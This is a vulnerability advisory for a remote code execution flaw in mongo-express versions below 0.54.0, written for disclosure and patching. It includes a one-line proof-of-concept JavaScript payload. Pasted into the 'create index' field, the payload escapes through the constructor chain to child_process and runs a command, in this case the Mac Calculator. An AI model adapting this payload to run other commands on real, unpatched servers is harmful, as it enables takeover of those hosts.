Remote code execution on the host machine by any authenticated user.
Launching mongo-express on a Mac, pasting the following into the “create index” field will pop open the Mac calculator:
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')
Users should upgrade to version 0.54.0
Is there a way for users to fix or remediate the vulnerability without upgrading?
If you have any questions or comments about this advisory:
@JLLeitschuh for finding and reporting this vulnerability
CPE | Name | Operator | Version |
---|---|---|---|
mongo-express | lt | 0.54.0 |